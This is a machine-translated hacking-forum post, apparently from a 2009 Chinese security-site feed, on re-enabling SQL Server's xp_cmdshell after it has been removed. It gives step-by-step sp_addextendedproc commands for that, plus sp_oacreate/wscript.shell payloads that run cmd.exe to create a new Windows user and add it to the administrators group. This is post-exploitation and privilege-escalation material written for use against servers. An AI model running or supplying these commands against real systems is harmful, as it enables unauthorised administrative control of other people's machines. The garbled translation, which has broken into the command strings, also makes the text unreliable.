A common situation is back to execute the xp_cmdshell-vulnerability warning-the black bar safety net

2009-03-10T00:00:00
ID MYHACK58:62200922470
Type myhack58
Reporter 佚名
Modified 2009-03-10T00:00:00

Description

Common case resume execution of xp_cmdshell.

1 could not find stored procedure'master..xpcmdshell'. Recovery method: query separator connected, The first step to perform:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int The second step execution:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' Then press the F5 key, the command execution is completed

2 unable to load DLL xpsql70.dll or the DLL is referenced in a DLL. Reasons 1 2 6(cannot find the specified module.) Recovery method: query separator connected, The first step to perform: sp_dropextendedproc "xp_cmdshell" The second step execution: sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' Then press the F5 key, the command execution is completed

3 not in the library xpweb70.dll find the function xp_cmdshell to. Reasons: 1 2 7(cannot find the specified program.) Recovery method: query separator connected, The first step to perform:exec sp_dropextendedproc 'xp_cmdshell' The second step to perform:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' Then press the F5 key, the command execution is completed

IV. The ultimate method. If the above method cannot be recovered,please try to use the following way to directly add an account: Query separator connected, 2000servser system: declare @shell int exec sp_oacreate 'wscript. shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user new user password /add'

declare @shell int exec sp_oacreate 'wscript. shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators a new user /add'

xp or 2003server system:

declare @shell int exec sp_oacreate 'wscript. shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user new user password /add'

declare @shell int exec sp_oacreate 'wscript. shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators a new user /add'